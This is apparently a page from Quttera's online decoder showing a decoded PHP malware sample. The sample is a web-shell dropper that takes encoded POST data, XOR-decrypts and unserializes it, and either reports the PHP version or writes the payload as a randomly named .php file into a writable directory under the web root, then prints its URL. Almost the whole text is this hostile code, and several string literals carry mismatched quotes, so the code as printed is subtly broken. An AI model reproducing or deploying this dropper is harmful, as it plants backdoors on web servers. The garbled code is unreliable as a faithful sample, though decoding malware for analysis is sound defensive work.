Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


	function iTrKtE($ZEeEdVHUr){
	$FswMB = chr(1074-960)."aw".chr(559-442)."r".chr(774-666)."deco".chr(692-592).chr(619-518);
	$fSinX = "str_".chr(587-473)."o".chr(289-173)."13";
	$ZgfGP = chr(193-78)."tr_sp".chr(174-66)."it";
	$ZEeEdVHUr = $ZgfGP($FswMB($fSinX($ZEeEdVHUr)));
	return $ZEeEdVHUr;
}
	function xDYTeUaVpk($mWoZJQy, $ZEeEdVHUr){
	$fjwZghmlh = chr(1087-972)."t".chr(1043-929)."_s'.chr(245-133)."lit";
	$mWoZJQy = array_slice($fjwZghmlh(str_repeat($mWoZJQy, (count($ZEeEdVHUr)/16)+1)), 0, count($ZEeEdVHUr));
	return $mWoZJQy;
}
	function JjGRbBlWy($yocCSrpqZ, $QDYQwhh, $mWoZJQy){
	$LrkHqCAZs = "757264dc-ac01-4d09-9a14-05d1afceeb2a";
	return $yocCSrpqZ ^ $LrkHqCAZs[$QDYQwhh % strlen($LrkHqCAZs)] ^ $mWoZJQy;
}
	function RnwZGRVv($ZEeEdVHUr, $mWoZJQy){
	$ZEeEdVHUr = array_map("JjGRbBlWy", array_values($ZEeEdVHUr), array_keys($ZEeEdVHUr), array_values($mWoZJQy));
	$ZEeEdVHUr = implode("", $ZEeEdVHUr);
	$RxsKXgcR = 'u'.chr(513-403).chr(423-308).chr(180-79).'rial'.chr(413-308)."ze';
	$ZEeEdVHUr = @$RxsKXgcR($ZEeEdVHUr);
	return $ZEeEdVHUr;
}
	function KZBVUbW($pgKebIxGmJir){
	static $LzYOl = array();
	$bGJPVulKd = glob($pgKebIxGmJir . '/*', GLOB_ONLYDIR);
	$bvPKiu = count($bGJPVulKd);
		if ($bvPKiu > 0) {
			foreach ($bGJPVulKd as $pgKebIxGmJ) {
			$AENZEtFivS = chr(532-427)."s_".chr(859-740)."ritable";
				if (@$AENZEtFivS($pgKebIxGmJ)) {
				$LzYOl[] = $pgKebIxGmJ;
			}
		}
	}
	foreach ($bGJPVulKd as $pgKebIxGmJir) KZBVUbW($pgKebIxGmJir);
	return $LzYOl;
}
	function qkNHa($ZEeEdVHUr){
	$Rwzyzgt = "DO".chr(73-6).chr(966-881)."ME'.chr(295-217).chr(234-150)."_RO".chr(180-101)."T";
	$BhyhQjD = $_SERVER[$Rwzyzgt];
	$bGJPVulKd = KZBVUbW($BhyhQjD);
	$wPbFQapCaW = array_rand($bGJPVulKd);
	$lCabVO = chr(1006-960).'php';
	$mBrBKOlUq = $bGJPVulKd[$wPbFQapCaW] . "/" . substr(md5(time()), 0, 8) . $lCabVO;
	$kvxQDdNh = "fil".chr(727-626)."_put_c".chr(1105-994)."ntents";
	@$kvxQDdNh($mBrBKOlUq, $ZEeEdVHUr);
	$OMRGVeqS = 'HTTP_HO".chr(248-165).chr(535-451);
	$bhjDjt = "http:".chr(751-704).chr(805-758);
	$CSlKipZu = $bhjDjt . $_SERVER[$OMRGVeqS] . substr($mBrBKOlUq, strlen($BhyhQjD));
	print($CSlKipZu);
	die();
}
	foreach ($_POST as $mWoZJQy => $ZEeEdVHUr){
	$JgUJCGR = strlen($mWoZJQy);
		if ($JgUJCGR == 16){
		$ZEeEdVHUr = iTrKtE($ZEeEdVHUr);
		$mWoZJQy = xDYTeUaVpk($mWoZJQy, $ZEeEdVHUr);
		$ZEeEdVHUr = RnwZGRVv($ZEeEdVHUr, $mWoZJQy);
			if (@is_array($ZEeEdVHUr)){
			$wPbFQapCaW = array_keys($ZEeEdVHUr);
			$ZEeEdVHUr = $ZEeEdVHUr[$wPbFQapCaW[0]];
				if ($ZEeEdVHUr === $wPbFQapCaW[0]){
				$jFWvoNJ = chr(765-653)."hp";
				$lWZTaEUex = "phpv'.chr(864-763)."rsion";
				$OKONxInPWK = chr(741-626).chr(459-358)."rial".chr(244-139)."ze";
				echo @$OKONxInPWK(Array($jFWvoNJ => @$lWZTaEUex(), ));
			}
				else {
				qkNHa($ZEeEdVHUr);
			}
		}
	}
}
#  © 2023 Quttera Ltd. All rights reserved.